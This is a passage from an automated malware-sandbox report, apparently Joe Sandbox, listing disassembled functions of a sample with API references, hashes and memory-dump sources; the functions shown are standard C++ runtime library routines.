Instruction ID: 304ffd4f9296eaba08644137e6ec93464c4e4940ae2de905874f064e7a01c169
Opcode Fuzzy Hash: 91521d98319a5a2b9b08759a4322e951b3fa054d078199bb11df0d5f795575d8
Instruction Fuzzy Hash: 1651E475900208AFDB11CFA9D884AEEBBF4EF09701F1441AFE555E7291E7309A81CF60

Function 024A4AB4 Relevance: 10.6, APIs: 7, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 024A4ACD

Part of subcall function 024A4D9C: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,024A4800), ref: 024A4DAC

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 024A4AE2
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4AF1
__CxxThrowException@8.LIBVCRUNTIME ref: 024A4AFF
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 024A4B75
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A4BB5
__CxxThrowException@8.LIBVCRUNTIME ref: 024A4BC3

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID:
API String ID: 3151764488-0
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: c7ce8f428c2cfad80e7a49426ad3e0874cbc2eccb3bb0d8ae1723269abb717b2
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: D331B439A002149BCF04EF69C8A1B6EB3B6FF54710F20456BD9159B381DBB0EA05CB94

Function 0043F941 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction ID: 860e752c6eb2c716a5d855c3c03ea0c0e6c73714a276bf2c7701abe861d4aafe
Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
Instruction Fuzzy Hash: 51113A72A00216BFD7206FB7AC04F6B7B6CEF8A735F10123BF815C7240DA3889048669

Function 024BFBA8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction ID: 3d909a4b5b6762711c542bdc472c1f88c6bdb8b3e6dd532265786691cd7f5b8a
Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
Instruction Fuzzy Hash: 0011D631604115BBDB222F77CC589AB7A6DFF82B21B110A2BFC19C7240DB308885CAB0

Function 0043A383 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0043A0CA: _free.LIBCMT ref: 0043A0F3

_free.LIBCMT ref: 0043A3D1

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A3DC
_free.LIBCMT ref: 0043A3E7
_free.LIBCMT ref: 0043A43B
_free.LIBCMT ref: 0043A446
_free.LIBCMT ref: 0043A451
_free.LIBCMT ref: 0043A45C

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 8be3f6aa1696d7c36a68609bae5c6e68c8e713719265dd61fa4e844ff8b4370f
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: C611B472581B04A6E531BF72CC0BFCB77AD6F18305F40581EB6DA7B052CA2CB5144B46

Function 024BA5EA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024BA331: _free.LIBCMT ref: 024BA35A

_free.LIBCMT ref: 024BA638

Part of subcall function 024B36D1: HeapFree.KERNEL32(00000000,00000000,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?), ref: 024B36E7
Part of subcall function 024B36D1: GetLastError.KERNEL32(?,?,024BA35F,?,00000000,?,00000000,?,024BA603,?,00000007,?,?,024BA9F7,?,?), ref: 024B36F9

_free.LIBCMT ref: 024BA643
_free.LIBCMT ref: 024BA64E
_free.LIBCMT ref: 024BA6A2
_free.LIBCMT ref: 024BA6AD
_free.LIBCMT ref: 024BA6B8
_free.LIBCMT ref: 024BA6C3

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction ID: 082890d3969e0dbd7c6e4566ddb332ede1ee3d406a60d49ca7e7f1856f658f1b
Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
Instruction Fuzzy Hash: E1115171644B14AADE32BBB3CC45FCF7BDEDF00B00F40082FA299AA150DAA5B5145E60

Function 004123F2 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412400
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412406
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 00412433
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041243D
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,00410B39,?,?,?,00000000), ref: 0041244F
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412465
__CxxThrowException@8.LIBVCRUNTIME ref: 00412473

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction ID: 91daacb073e6275429519e5223cc2729029c874a602b9c25603bfcabc23aa3f5
Opcode Fuzzy Hash: a863a92f0c1e6d652057a51708b91d14413968702bc4a7dce5340fefc1acb9cb
Instruction Fuzzy Hash: 4001F734600121ABC714AF66ED0ABEF3768AF42B56B60042BF905E2161DBACDA54866D

Function 02492659 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLogicalProcessorInformation.KERNEL32(00000000,?,00000000,?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 02492667
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249266D
GetLogicalProcessorInformation.KERNEL32(00000000,?,?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 0249269A
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 024926A4
GetLastError.KERNEL32(?,0000FFFF,00000000,?,00000000,?,02490DA0,?,?,?,00000000), ref: 024926B6
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024926CC
__CxxThrowException@8.LIBVCRUNTIME ref: 024926DA

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID:
API String ID: 4227777306-0
Opcode ID: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction ID: faecae0fd15cc66c1acda4ae3ac3027a44ce648a615dc82bfdd9fbbbbd9a7793
Opcode Fuzzy Hash: 6ffd0926a6e81f7b76a1000da81b11bcce1220a1458d59011de0bfb908ca6654
Instruction Fuzzy Hash: 9A018435501115BBDB24FF66EC48FAF3F6DAF42F52B50042BF905D2560DBA4DD048AA8

Function 024924A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0249670B), ref: 024924B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 024924C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 024924D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0249670B), ref: 02492500
GetProcAddress.KERNEL32(00000000), ref: 02492507
GetLastError.KERNEL32(?,?,?,0249670B), ref: 02492522
GetLastError.KERNEL32(?,?,?,0249670B), ref: 0249252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492544
__CxxThrowException@8.LIBVCRUNTIME ref: 02492552

Strings

kernel32.dll, xrefs: 024924B0, 024924B5, 024924FA

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction ID: bb165416997f65df04b4a2a0e5298a38b4ae3f5dbf9295b6d20412f9f6192be1
Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
Instruction Fuzzy Hash: 5DF086769003103FBB117B757C9991B3FADDD46B32310062BF811E2291EBB589018A58

Function 0040C618 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C677

Strings

F(@, xrefs: 0040C651
F(@, xrefs: 0040C61B
ios_base::badbit set, xrefs: 0040C63A, 0040C65A
ios_base::failbit set, xrefs: 0040C644
ios_base::eofbit set, xrefs: 0040C649

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: Exception@8Throw
String ID: F(@$F(@$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-3619870194
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: df443d8f91edbbbc86da8982951f5297a94925b32ed328c00139598aac834c40
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: FAF0FC72900204AAC714D754CC42FAF33545B11305F14867BED42B61C3EA7EA945C79C

Function 00430EC2 Relevance: 9.3, APIs: 6, Instructions: 266COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52

_memcmp.LIBVCRUNTIME ref: 0043116C
_free.LIBCMT ref: 004311DD
_free.LIBCMT ref: 004311F6
_free.LIBCMT ref: 00431228
_free.LIBCMT ref: 00431231
_free.LIBCMT ref: 0043123D

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: _free$ErrorLast$_memcmp
String ID:
API String ID: 4275183328-0
Opcode ID: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction ID: 3f2797ad77f757c3ae12916b07ca9a57840cbe3c0d6446731fa2169183c3460f
Opcode Fuzzy Hash: d8dc9f9b959f2552d3534fca6110d840858028caececac5b62d3d4aa587a1dd2
Instruction Fuzzy Hash: 57B13975A016199FDB24DF18C884AAEB7B4FF48314F1086EEE909A7360D775AE90CF44

Function 024B239B Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,024B25EC,00000001,00000001,?), ref: 024B23F5
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,024B25EC,00000001,00000001,?,?,?,?), ref: 024B247B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 024B2575
__freea.LIBCMT ref: 024B2582

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

__freea.LIBCMT ref: 024B258B
__freea.LIBCMT ref: 024B25B0

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction ID: b22284ccdf18279aa4bd1f70a91a509e7ccba57689c2f60cee963e24ae1c1c48
Opcode Fuzzy Hash: a510e50ab4e30f723abca725981774e3b8e951c367f08997725210aeddea5634
Instruction Fuzzy Hash: 4C51F272A10216ABDB26CF64CC60EEF77AAEF44754F154A2AFC04DA240DBB4DD41CA70

Function 024AE419 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 024AE445
__cftoe.LIBCMT ref: 024AE477

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction ID: dfd613974eeed67c34c02fdc6c50891be6922ed9c2229ea5b5d628f82eef36e0
Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
Instruction Fuzzy Hash: 37510832A00205ABDF259FA9DC50BAF77ADEF68334F54427FE825D6281EB31D5018A64

Function 024A302B Relevance: 9.1, APIs: 6, Instructions: 106COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 024A3051

Part of subcall function 02498AB2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 02498ABD

SafeSQueue.LIBCONCRT ref: 024A306A
Concurrency::location::_Assign.LIBCMT ref: 024A312A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 024A314B
__CxxThrowException@8.LIBVCRUNTIME ref: 024A3159

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
String ID:
API String ID: 3496964030-0
Opcode ID: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction ID: db7712c667c082d4243ddbbeb187c6e01706e21f0237bee865d658359b1ef492
Opcode Fuzzy Hash: 0093e90f9f9b4a807c17d0b905e901c0316188718c0b65bdcccfb738fdf3468d
Instruction Fuzzy Hash: 6231DF31A046119FCB25EF69C864BAABBB1FF54710F10859ED9068B255EB70E945CFC0

Function 024A8F24 Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 024A8F77
FindMITargetTypeInstance.LIBVCRUNTIME ref: 024A8F90
FindVITargetTypeInstance.LIBVCRUNTIME ref: 024A8F97
PMDtoOffset.LIBCMT ref: 024A8FB6

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: FindInstanceTargetType$Offset
String ID:
API String ID: 1467055271-0
Opcode ID: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction ID: d9fb731b62fc149d879936de6bcaf1d26b29541b32e671e4603a36899cb79b6a
Opcode Fuzzy Hash: 6fe96d91ed349e682c0e64a172f602ef2dce5d8881000acf6ba3df64c6c4f2c7
Instruction Fuzzy Hash: D82138726042069FDF14DF69DC55AAE77A6EF64754B10821FF91293280E731E941CE90

Function 02485437 Relevance: 9.1, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

__Cnd_init.LIBCPMT ref: 0248544B
__Mtx_init.LIBCPMT ref: 02485471
std::_Cnd_initX.LIBCPMT ref: 02485494
__Thrd_start.LIBCPMT ref: 024854B9
std::_Cnd_waitX.LIBCPMT ref: 024854D9
std::_Cnd_initX.LIBCPMT ref: 02485506

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
String ID:
API String ID: 1687354797-0
Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction ID: f7529a1dacc1a483d70a761c0b941259b6dc09c63a052464892f94b3f8ea3335
Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
Instruction Fuzzy Hash: 9021A071C21208AADF01FBF9D840BDEBBF9AF09325F54401FE104B7280DB749A448E25

Function 00428DDA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,DB71353F), ref: 00428DE8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428DF6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E0F
SetLastError.KERNEL32(00000000,?,00428DD1,00426762,004406A0,00000008,00440A05,?,?,?,?,00423A4B,?,?,DB71353F), ref: 00428E61

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 8d354f8c373550ad8ca54886775f1e1f72959a5719103f68ef850459183cda9d
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 5801283630A7316EA7242BF57C8956F2744EB0677ABA0033FF414913E2EF194C21950D

Function 024A9041 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A904F
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 024A905D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 024A9076
SetLastError.KERNEL32(00000000,?,024A9038,024A69C9,024C0907,00000008,024C0C6C,?,?,?,?,024A3CB2,?,?,0045A064), ref: 024A90C8

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction ID: 2d13900fcbd54f275cd37ca487f3f67ec03d4353d4293964fe3dad73cb3071a9
Opcode Fuzzy Hash: e85c682642ed7c149dd5185dec7a9b8ad0a0b140fbe983a0f7f6208f4934dca6
Instruction Fuzzy Hash: 3A01FC3320D7216EA72427B57CA99672755EB357B5B30033FF520493E1EF1288658D85

Function 00404D52 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404D63
int.LIBCPMT ref: 00404D7A

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00404D83
std::_Facet_Register.LIBCPMT ref: 00404DB4
std::_Lockit::~_Lockit.LIBCPMT ref: 00404DCA
__CxxThrowException@8.LIBVCRUNTIME ref: 00404DE8

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 50d9ff0d4b57cf36d5715a51c78873cd43da78958b4b2dc720108d245924cf68
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: EB11A0B2D101299BCB15EBA4C841AAE77B0AF44318F14457FE911BB2D2DB3C9A058BDD

Function 02484FB9 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02484FCA
int.LIBCPMT ref: 02484FE1

Part of subcall function 0248BFC3: std::_Lockit::_Lockit.LIBCPMT ref: 0248BFD4
Part of subcall function 0248BFC3: std::_Lockit::~_Lockit.LIBCPMT ref: 0248BFEE

std::locale::_Getfacet.LIBCPMT ref: 02484FEA
std::_Facet_Register.LIBCPMT ref: 0248501B
std::_Lockit::~_Lockit.LIBCPMT ref: 02485031
__CxxThrowException@8.LIBVCRUNTIME ref: 0248504F

Memory Dump Source

Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction ID: 5c43502c7d1c2b6603fea09ba7882039da7b2105ff86d9db859e625ce53303c6
Opcode Fuzzy Hash: 845bdeb7715bd98cda63df9c5850d512ab2bcf4152fe4b0e9e0a5932c046342a
Instruction Fuzzy Hash: E311C2319202289BCB25FB65D800AEE77B2BF05314F55051FE816AB2D0DF749A06CFD0

Function 0040C189 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C19A
int.LIBCPMT ref: 0040C1B1

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 0040C1BA
std::_Facet_Register.LIBCPMT ref: 0040C1EB
std::_Lockit::~_Lockit.LIBCPMT ref: 0040C201
__CxxThrowException@8.LIBVCRUNTIME ref: 0040C21F

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction ID: ee53003dfc9470fa79d8cc5ab50186f75a1860792542933f5f9c6443a3e70220
Opcode Fuzzy Hash: 85abdb0988c3cddd0f6a8b60fdbc61777acb1b1010c60c0f2330721e54f81ae2
Instruction Fuzzy Hash: B2119172900219EBCB15EB90C881AAD7760AF44314F14053FE811BB2D2DB389A059B99

Function 004054D2 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 004054E3
int.LIBCPMT ref: 004054FA

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87

std::locale::_Getfacet.LIBCPMT ref: 00405503
std::_Facet_Register.LIBCPMT ref: 00405534
std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
__CxxThrowException@8.LIBVCRUNTIME ref: 00405568

Memory Dump Source

Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
String ID:
API String ID: 2243866535-0
Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C

Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
int.LIBCPMT ref: 00405596

Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
